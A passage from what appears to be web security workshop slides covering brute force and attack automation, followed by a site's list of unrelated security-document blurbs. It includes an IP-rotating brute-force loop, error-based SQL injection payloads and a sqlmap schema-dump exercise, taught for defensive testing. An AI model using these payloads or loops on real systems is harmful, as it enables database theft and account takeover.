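extract_string(boolean_oracle(db), "(SELECT Password FROM UserProfile WHERE Id = 1)") recovers the value in roughly seven requests per character; swapping in time_oracle(db) recovers the same value without a single byte of it ever appearing in a response, which is the cost the time-based slide describes: the same questions, each now paid for in wall-clock time.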
84 Exercise 15 Brute force attacks
85 Understanding brute force attacks Functions may be exploited if an attacker is given enough attempts at it Controls may exist to limit unsuccessful attempts but they can put usability at risk Sufficiently sophisticated attackers can circumvent many brute force defences
86 Some quick brute force attack tips: identify if any defences exist (they're frequently missing). Where defences exist, how are they implemented? Block the resource being requested; block the source IP address; rate limit (again, by resource or IP)
87 Exercise 15 Brute force attacks: test for protection against brute force attacks; consider resources that should provide a defence; assess behaviour when attack-like activity occurs. Hacker Challenge 15: Identify a lack of brute force protection in a site you use. Hint: avoid banks & social
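The tips list three defence shapes and slide 85 warns that each carries a usability cost and can be circumvented. The example below is added here and is not the workshop's code: a Python login guard where the account lockout and the per-IP block are each optional, plus an attacker loop that rotates source addresses, so you can see which defence stops which attacker and what it costs the legitimate user. The user store and address ranges are constructed; the clock is injectable so the sliding window is testable.

```python
import time
from collections import defaultdict, deque

# Constructed user store (assumption).
USERS = {"alice": "correct horse battery staple"}


class LoginGuard:
    """The slide's defences, each optional: lock the target account after
    per_account failures, block a source IP after per_ip failures, both counted
    within a sliding window of `window` seconds."""

    def __init__(self, per_account=None, per_ip=None, window=60.0, clock=time.monotonic):
        self.per_account, self.per_ip, self.window, self.clock = per_account, per_ip, window, clock
        self.account_failures = defaultdict(deque)
        self.ip_failures = defaultdict(deque)

    def _recent(self, failures):
        """Drop failures older than the window and return how many remain."""
        now = self.clock()
        while failures and now - failures[0] > self.window:
            failures.popleft()
        return len(failures)

    def attempt(self, user, ip, password):
        if self.per_account is not None and self._recent(self.account_failures[user]) >= self.per_account:
            return "locked-account"
        if self.per_ip is not None and self._recent(self.ip_failures[ip]) >= self.per_ip:
            return "blocked-ip"
        if USERS.get(user) == password:
            return "ok"
        now = self.clock()
        self.account_failures[user].append(now)
        self.ip_failures[ip].append(now)
        return "fail"


def brute_force(guard, user, guesses, ips):
    """Attacker cycling through source addresses. Returns (password or None, requests sent).
    An IP block is simply rotated past; an account lock ends the run."""
    sent = 0
    for i, guess in enumerate(guesses):
        result = guard.attempt(user, ips[i % len(ips)], guess)
        sent += 1
        if result == "ok":
            return guess, sent
        if result == "locked-account":
            return None, sent
    return None, sent
```

With per_ip=20 and a hundred addresses the attacker never trips the block and finds the password; with per_account=5 the run ends after six requests, but so does the real user's ability to log in, which is the usability risk slide 85 names. Rate limiting per account with a short window, rather than a hard lock, is the usual compromise.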
88 Exercise 16 Automating attacks and review
89 Understanding attack automation: payloads of the kind an automated scanner sends against the supercarid parameter (URL-encoded as captured, each followed by its decoded form):
    supercarid%27+and+%27x%27%3d%27x
        supercarid' and 'x'='x
    convert%28int%2cdb_name%28%29+collate+sql_latin1_general_cp1254_CS_AS%29+and+1%3D1
        convert(int,db_name() collate sql_latin1_general_cp1254_CS_AS) and 1=1
    convert%28int%2c%28char%2882%29%2bchar%2833%29%2b%28select+top+1+cast%28count%28%5bname%5d%29+as+nvarchar%284000%29%29+from+%5bsysobjects%5d+where+xtype%3dchar%2885%29+%29%2bchar%2833%29%2bchar%2882%29%29%29--
        convert(int,(char(82)+char(33)+(select top 1 cast(count([name]) as nvarchar(4000)) from [sysobjects] where xtype=char(85) )+char(33)+char(82)))--
    The first is a tautology test; the second forces a conversion error whose message carries the database name; the third wraps the count of user tables (xtype 'U') in R!...!R markers so the tool can pick the value out of the error text automatically.
90 NetSparker PDF Report: tinyurl.com/hackyourself-netsparker
91 Some quick attack automation tips: consider how targets can be identified (Shodan, Google dorks, random crawling); think about the actions that adhere to a pattern (SQL injection, fuzzing, directory enumeration). Automation can be used for good! Use it to streamline your own security reviews
92 Exercise 16 Attack automation Mount an automated SQLi attack Use sqlmap to fast-track the attack Analyse various vulnerable pages Hacker Challenge 16: Extract the entire schema from the database Hint: sqlmap.py --help
Hack Yourself First. Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationOffensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0
Offensive Security Advanced Web Attacks and Exploitation v. 1.0 Mati Aharoni Devon Kearns Course Overview The days of porous network perimeters are fading fast as services become more resilient and harder
More informationWeb Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
More informationClient Side Filter Enhancement using Web Proxy
Client Side Filter Enhancement using Web Proxy Santosh Kumar Singh 1, Rahul Shrivastava 2 1 M Tech Scholar, Computer Technology (CSE) RCET, Bhilai (CG) India, 2 Assistant Professor, CSE Department, RCET
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationRevisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist
Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist Overview Background What it is? How are we doing? Web 2.0 SQL injection meets AJAX Fuggle SQL Injection meets Google
More informationSecure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
More informationExternal Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
More informationHTTP. Internet Engineering. Fall 2015. Bahador Bakhshi CE & IT Department, Amirkabir University of Technology
HTTP Internet Engineering Fall 2015 Bahador Bakhshi CE & IT Department, Amirkabir University of Technology Questions Q1) How do web server and client browser talk to each other? Q1.1) What is the common
More informationThreat Modeling/ Security Testing. Tarun Banga, Adobe 1. Agenda
Threat Modeling/ Security Testing Presented by: Tarun Banga Sr. Manager Quality Engineering, Adobe Quality Leader (India) Adobe Systems India Pvt. Ltd. Agenda Security Principles Why Security Testing Security
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationWorkday Mobile Security FAQ
Workday Mobile Security FAQ Workday Mobile Security FAQ Contents The Workday Approach 2 Authentication 3 Session 3 Mobile Device Management (MDM) 3 Workday Applications 4 Web 4 Transport Security 5 Privacy
More informationAttack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationHTTP Fingerprinting and Advanced Assessment Techniques
HTTP Fingerprinting and Advanced Assessment Techniques Saumil Shah Director, Net-Square Author: Web Hacking - Attacks and Defense BlackHat 2003, Washington DC The Web Hacker s playground Web Client Web
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationSAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov
Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real
More informationNational Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationOWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available
More informationSESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS Ben Stock, Martin Johns, Sebastian Lekies Browser choices Full disclosure: Ben was an intern with Microsoft
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationSTABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
More informationOnline Vulnerability Scanner Quick Start Guide
Online Vulnerability Scanner Quick Start Guide Information in this document is subject to change without notice. Companies, names, and data used in examples herein are fictitious unless otherwise noted.
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationAdvanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More informationRational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
More informationCTIS 256 Web Technologies II. Week # 1 Serkan GENÇ
CTIS 256 Web Technologies II Week # 1 Serkan GENÇ Introduction Aim: to be able to develop web-based applications using PHP (programming language) and mysql(dbms). Internet is a huge network structure connecting
More informationRuby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
More informationWeb Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
More information